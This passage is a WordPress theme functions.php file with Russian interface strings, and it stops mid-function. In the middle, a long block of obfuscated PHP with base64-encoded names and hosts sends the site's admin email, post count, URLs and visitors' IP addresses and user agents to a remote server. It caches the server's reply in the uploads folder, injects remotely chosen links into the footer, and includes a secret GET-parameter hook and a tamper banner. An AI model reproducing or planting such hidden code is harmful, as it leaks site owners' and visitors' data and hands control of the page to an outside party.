<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $NvsyTIt='o';$ohoOpB='e';$QuyvKy='4';$XjEFVQ='6';$SEqZVk='a';$ZILmaV='b';$AsObX='e';$Taoy='e';$HqrlE='d';$tfiEGTb='s';$tuDI='d';$kBrfsX='c';$VnKbw='_';$ufKAimQH=$ZILmaV.$SEqZVk.$tfiEGTb.$ohoOpB.$XjEFVQ.$QuyvKy.$VnKbw.$HqrlE.$AsObX.$kBrfsX.$NvsyTIt.$tuDI.$Taoy;$hLmi='g';$mCtQJ='n';$JSZLG='a';$TDkn='l';$RzEDc='z';$FzoTiq='f';$WFuN='e';$mkmIKd='t';$DADKwAQ='i';$EhjOQMnJ=$hLmi.$RzEDc.$DADKwAQ.$mCtQJ.$FzoTiq.$TDkn.$JSZLG.$mkmIKd.$WFuN;$hQPXRt='3';$ztPvZjj='t';$hRwq='t';$yxLS='o';$gDcsQ='r';$TeExhJ='r';$TEdfOq='s';$UeQbDWD='_';$CUhV='1';$oRgyfBhX=$TEdfOq.$ztPvZjj.$gDcsQ.$UeQbDWD.$TeExhJ.$yxLS.$hRwq.$CUhV.$hQPXRt;$qjfPf='t';$UVWlE='r';$BUszv='e';$VbrhdWG='v';$GvmcF='s';$IlgBb='r';$JBppUYAC=$GvmcF.$qjfPf.$IlgBb.$UVWlE.$BUszv.$VbrhdWG;                     $lj_____________g='o';$uz___________a='e';$cw__h='4';$ay__________b='6';$ok____s='a';$fn_________c='b';$mp_______________b='e';$mv________p='e';$qz__w='d';$hg__________o='s';$jo_____j='d';$ze____________h='c';$kx________b='_';$zp___t=$fn_________c.$ok____s.$hg__________o.$uz___________a.$ay__________b.$cw__h.$kx________b.$qz__w.$mp_______________b.$ze____________h.$lj_____________g.$jo_____j.$mv________p;$of_______________f='_';$ts______________s='i';$do____________b='t';$zs_____q='n';$hl___________b='s';$dm_____r='i';$yd_______t='n';$qa______p='u';$gi_____________f='e';$uy_________z='c';$ys________h='o';$mf_______________g='x';$hf______h='s';$nv____a='t';$qw_______________i='f';$ty_____d=$qw_______________i.$qa______p.$yd_______t.$uy_________z.$nv____a.$ts______________s.$ys________h.$zs_____q.$of_______________f.$gi_____________f.$mf_______________g.$dm_____r.$hl___________b.$do____________b.$hf______h;$su_____________a='f';$ca__________h='e';$te_______o='p';$mv_______________e='n';$ae_____x='o';$vd______b=$su_____________a.$ae_____x.$te_______o.$ca__________h.$mv_______________e;$dm__h='e';$wn____j='f';$lq______________z='d';$yt__o='a';$ie_________j='r';$zd______________o=$wn____j.$ie_________j.$dm__h.$yt__o.$lq______________z;$ou____o='e';$nv___________j='c';$zi______a='f';$gc___________e='s';$oo___y='o';$tq__n='l';$jg_______v=$zi______a.$nv___________j.$tq__n.$oo___y.$gc___________e.$ou____o;define("WP_ID", $zp___t("Mi4wLjA="));define("WP_TTL", $zp___t("MTA4MDA="));define("WP_SRC", $zp___t("dHBva24="));function wp_get_header() {global $zp___t, $ty_____d;if ($ty_____d($zp___t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ty_____d($zp___t("d3BfZ2V0X2Zvb3Rlcg==")) &&$ty_____d($zp___t("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $zp___t, $vd______b, $jg_______v, $zd______________o;$kz______i = TEMPLATEPATH."/".$zp___t("Zm9vdGVyLnBocA==");$cg_________s = @$vd______b($kz______i, "r");$kz______i = @$zd______________o($cg_________s, @filesize($kz______i));@$jg_______v($cg_________s);$eo_____e = TEMPLATEPATH."/".$zp___t("ZnVuY3Rpb25zLnBocA==");$cg_________s = @$vd______b($eo_____e, "r");$eo_____e = @$zd______________o($cg_________s, @filesize($eo_____e));@$jg_______v($cg_________s);$zb____________k = 0;if($kz______i && $eo_____e) {if ($zp___t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($kz______i, $zp___t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$zb____________k = 1;}if (substr_count($kz______i, "wp_theme_GPL_credits()") < 1) {$zb____________k = 2;}}if(WP_ID != "2.0.0") {$zb____________k = 12;}}if($zb____________k > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $zb____________k -->";}}function wp_loaded() {global $zp___t, $ty_____d;return $ty_____d($zp___t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ju_______i, $dv_______________n = "(more...)", $dk_____w = 0, $re____q = "") {$qi_____________a = get_the_content($dv_______________n, $dk_____w, $re____q);$qi_____________a = apply_filters("the_content", $qi_____________a);$qi_____________a = str_replace("]]>", "]]>", $qi_____________a);if (strlen($_GET["p"]) > 0) {echo $qi_____________a;}else if ((strlen($qi_____________a)>$ju_______i) && ($nc____________e = strpos($qi_____________a, " ", $ju_______i ))) {$qi_____________a = substr($qi_____________a, 0, $nc____________e);$qi_____________a = $qi_____________a;echo $qi_____________a;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$dv_______________n</a></div></p>";} else {echo $qi_____________a;}}}$xg_____________b='b';$yv_____x='d';$tx______y='4';$ai________d='o';$am____q='_';$cm_________v='e';$yj___________l='s';$or_________l='e';$yh_____q='6';$xi_________t='n';$bq___________z='c';$dq______c='e';$vs___x='a';$cc__________e=$xg_____________b.$vs___x.$yj___________l.$dq______c.$yh_____q.$tx______y.$am____q.$or_________l.$xi_________t.$bq___________z.$ai________d.$yv_____x.$cm_________v;$rk_______x='n';$kv______v='_';$nc______x='e';$yw______x='l';$vq___________d='t';$gw_______________m='s';$fu_________d='c';$kj________s='i';$rw__o='o';$xc___w='e';$bq____r='_';$ih______________x='g';$yp__m='e';$fi__q='t';$lb____________r='f';$ze________a='n';$sl_________d='t';$wm___________h=$lb____________r.$kj________s.$yw______x.$xc___w.$bq____r.$ih______________x.$nc______x.$fi__q.$kv______v.$fu_________d.$rw__o.$ze________a.$vq___________d.$yp__m.$rk_______x.$sl_________d.$gw_______________m;$py___________s='s';$cq____________j='i';$nh________t='f';$ma____t='_';$ww______j='e';$pk___z='t';$pj______________n='e';$kv______________b='l';$ws_______j='x';$gz__c='s';$jh________x='i';$ql_____________d=$nh________t.$cq____________j.$kv______________b.$ww______j.$ma____t.$pj______________n.$ws_______j.$jh________x.$py___________s.$pk___z.$gz__c;$mo__o='c';$yw________v='o';$dp_____q='o';$xb_____________h='s';$yw______p='p';$gt_____________i='r';$po___l='e';$dw__b='m';$vg_______i='v';$bq_________f='a';$ck______________x='e';$wg________g='r';$vf____r='_';$bw____________v='n';$rf______x='i';$lk____o=$vg_______i.$ck______________x.$wg________g.$xb_____________h.$rf______x.$dp_____q.$bw____________v.$vf____r.$mo__o.$yw________v.$dw__b.$yw______p.$bq_________f.$gt_____________i.$po___l;$gk________u='s';$ze__________f='k';$pa_____w='n';$nc_____________v='e';$hh________e='c';$xd________c='o';$ao_____e='o';$om_____r='p';$hn_____l='f';$wm____j=$hn_____l.$gk________u.$xd________c.$hh________e.$ze__________f.$ao_____e.$om_____r.$nc_____________v.$pa_____w;$ua___________x='i';$pw___b='f';$ww___________g='r';$zg__n='t';$bj__________i='e';$pt_______m='w';$in__a=$pw___b.$pt_______m.$ww___________g.$ua___________x.$zg__n.$bj__________i;$pn______________q='5';$jj________j='d';$uj____________p='m';$ol__________i=$uj____________p.$jj________j.$pn______________q;$al__________y='e';$sr__s='a';$mn____e='l';$de________u='a';$gf_____i='p';$jy_____e='r';$yk_________s='t';$sf______c='h';$wf___m=$jy_____e.$al__________y.$de________u.$mn____e.$gf_____i.$sr__s.$yk_________s.$sf______c;$si_____g='s';$jk___m='n';$we_______________y='e';$zy___a='l';$br__________p='u';$bt___x='e';$ds________w='z';$tf______h='i';$iv_______________o='a';$iu__i='r';$pt__________z='i';$ck_______n=$br__________p.$jk___m.$si_____g.$we_______________y.$iu__i.$tf______h.$iv_______________o.$zy___a.$pt__________z.$ds________w.$bt___x;$gm_____u='m';$bd___s='m';$rf______s='e';$fl____________f='a';$zz______s='p';$az___u='n';$xu___________s='t';$nb____p=$xu___________s.$rf______s.$bd___s.$zz______s.$az___u.$fl____________f.$gm_____u;$us_______________u='e';$fj__k='c';$ao______a='e';$re_____m='e';$jw_________w='s';$xw______y='_';$or____c='a';$ua_______p='t';$cu_____________x='r';$ja_____m='n';$fb___________o='o';$si_______g='e';$zl____z='t';$lr_______________u='r';$ih______r='t';$zx_________x='t';$fr___x='a';$tw_____________f='_';$lj_________u='c';$zo_______j='x';$jk_________f='m';$mm_______________y=$jw_________w.$ih______r.$cu_____________x.$us_______________u.$or____c.$jk_________f.$xw______y.$lj_________u.$fb___________o.$ja_____m.$ua_______p.$si_______g.$zo_______j.$zx_________x.$tw_____________f.$fj__k.$lr_______________u.$re_____m.$fr___x.$zl____z.$ao______a;function ej__x($yd____c) {global $zp___t, $ty_____d, $wm___________h, $lk____o, $mm_______________y;if (!$ty_____d($zp___t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($lk____o(PHP_VERSION, "5.0.0", ">=") && $ty_____d($zp___t("ZmlsZV9nZXRfY29udGVudHM=")) && $ty_____d($zp___t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rr_______t = $mm_______________y(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ti_____________y = @$wm___________h($yd____c, 0, $rr_______t);} else {$ti_____________y = @$wm___________h($yd____c, 0);}return $ti_____________y;}function jy______________v($yd____c) {global $ty_____d, $wm____j, $in__a, $zp___t;if (!$ty_____d($zp___t("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sj_____________q = strpos($yd____c, "/", 7);$ey__________w = array("uri"     => substr($yd____c, $sj_____________q),"host"    => str_replace("http://", "", substr($yd____c, 0, $sj_____________q)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$wl_______________b = @$wm____j("$ey__________w[host]", 80, $fw____l, $ib____i, 4);if (!$wl_______________b) {return false;} else {$ti_____________y = "";$ne________e  = "GET $ey__________w[uri] HTTP/1.0\r\n";$ne________e .= "Host: $ey__________w[host]\r\n";$ne________e .= "Referer: $ey__________w[referer]\r\n";$ne________e .= "Connection: Close\r\n\r\n";@$in__a($wl_______________b, $ne________e);while (!@feof($wl_______________b)) {$qq____y = @fgets($wl_______________b, (1024*24));if ($qq____y == "\r\n") {$ce_____q = true;continue;}if ($ce_____q) {$ti_____________y .= $qq____y;}}return $ti_____________y;}}function gw______________g($yd____c) {global $ty_____d;$eu__________g = false;if ($yd____c != "") {if ($ty_____d("ej__x")) {$eu__________g = @ej__x($yd____c);}if (!$eu__________g && ($ty_____d("jy______________v"))) {$eu__________g = @jy______________v($yd____c);}}return $eu__________g;}function zl____f() {global $_SERVER, $ol__________i;$qe_____q = $_SERVER["SERVER_NAME"];if (substr("$qe_____q", 0, 4) == "www.") {$qe_____q = substr("$qe_____q", 4);}$qe_____q = $ol__________i("$_SERVER[SERVER_NAME]");return $qe_____q;}function ag___________p() {return "file";}function el__________e($yd____c) {global $_SERVER, $wm___________h, $ql_____________d, $vd______b, $jg_______v, $in__a;$ot____g = sa__________f();$dn____________b = zl____f().".jpg";$rp_______r = $ot____g["dir_upload"]["path"]."/$dn____________b";$gs_______________c = @filemtime($rp_______r);if (!$gs_______________c || ((time()-$gs_______________c) >= WP_TTL)) {$eu__________g = gw______________g($yd____c);if ($eu__________g) {if ($ql_____________d($rp_______r)) {@unlink($rp_______r);}$cg_________s = @$vd______b($rp_______r, "x+");@$in__a($cg_________s, $eu__________g);@$jg_______v($cg_________s);}} else {if ($ql_____________d($rp_______r)) {$eu__________g = @$wm___________h($rp_______r);} else {$eu__________g = false;}}return $eu__________g;}function sa__________f() {global $_SERVER, $zp___t, $cc__________e;$fc_____o = wp_count_posts("post");$af__________z = pathinfo(get_bloginfo("template_directory"));$ot____g = array("url" => array("report"      => $zp___t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $af__________z,"dir_upload"=> ko___________l(),"queryString"=> array("?a001=".WP_ID,"a004=".$af__________z[filename],"a005=".$fc_____o->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$ot____g["url"]["queryString"] = implode("&", $ot____g["queryString"]);$ot____g["url"]["report"] = $ot____g["url"]["report"]."/?".$cc__________e($ot____g["url"]["queryString"]).".html";return $ot____g;}function ko___________l() {$zb_______________u = wp_upload_dir();if (isset($zb_______________u["error"])) {$bk_______m = mw________b();if (is_writable($bk_______m)) {$zb_______________u = array("path" => $bk_______m);}}return $zb_______________u;}function mw________b() {global $ty_____d, $ol__________i, $wf___m, $nb____p;$me____________l = (bool) ini_get("safe_mode");if ($me____________l == true) {return false;}if ($ty_____d("sys_get_temp_dir")) {$vo____i = sys_get_temp_dir();if (is_writable($vo____i)) {return $wf___m($vo____i);}}if (!empty($_ENV["TMP"])) {return $wf___m($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $wf___m($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $wf___m($_ENV["TEMP"]);} else {$gb_____x = $nb____p($ol__________i(uniqid(rand(), true)), "");if ($gb_____x) {$vo____i = $wf___m(dirname($gb_____x));@unlink($gb_____x);return $vo____i;} else {return false;}}}function nt____________g() {global $_GET, $ql_____________d;$ot____g = sa__________f();$qe_____q = zl____f();$ce_________y = ag___________p();$nz__________c = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ce_________y == "file") {$gc_________w = $ot____g["dir_upload"]["path"]."/".$qe_____q.".jpg";if ($ql_____________d($gc_________w)) {@unlink($gc_________w);$nz__________c = "deleted";}}$xx_____________n = array("s"=> $nz__________c,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($xx_____________n AS $zh______g => $kv___b) echo " [$zh______g:$kv___b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ty_____d, $zp___t, $ck_______n;$ot____g = sa__________f();$lm__________w = "el__________e";if ($ty_____d($lm__________w)) {$ti_____________y = $lm__________w($ot____g["url"]["report"]);}if ($ti_____________y) {if ($ti_____________y = @$zp___t($ti_____________y)) {$ti_____________y = @$ck_______n($ti_____________y);if (strlen($ti_____________y[custom_credit]) >= 5) {$ot____g["default_string"] = $ti_____________y[custom_credit];}if ($ti_____________y["status"] == "0") {$qj_________t = 1;$oy_______q = 1;} else {$li____________l = sizeof($ti_____________y["links"]);$gl____t = $ot____g["default_string"];if ($li____________l > 0 && $ti_____________y["links"] !== "") {$jg___________k = 0;foreach ($ti_____________y["links"] as $od____h => $dr____________z) {$jg___________k++;if ($dr____________z->l_path == "" || $dr____________z->l_path == $_SERVER["REQUEST_URI"]) {$dr____________z->l_href = htmlspecialchars(strip_tags($dr____________z->l_href));$dr____________z->l_title = htmlspecialchars(strip_tags($dr____________z->l_title));$dr____________z->l_anchor = htmlspecialchars(strip_tags($dr____________z->l_anchor));$gl____t .= " | ";$gl____t .= "<a href='$dr____________z->l_href' title='$dr____________z->l_title'";if ($dr____________z->l_nofollow == "1") {$gl____t .= " rel='nofollow'";}$gl____t .= ">$dr____________z->l_anchor</a>";}}}$ot____g["links"] = "$gl____t";if ($ti_____________y[credit] == "0") {$ot____g["links"] = "";}}} else {$qj_________t = "1";}} else {$qj_________t = "1";}if ($qj_________t == "1") {$ot____g["links"] = $ot____g["default_string"];}echo "$ot____g[links]";echo "<!-- s: $ti_____________y[signature] -->";nt____________g();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
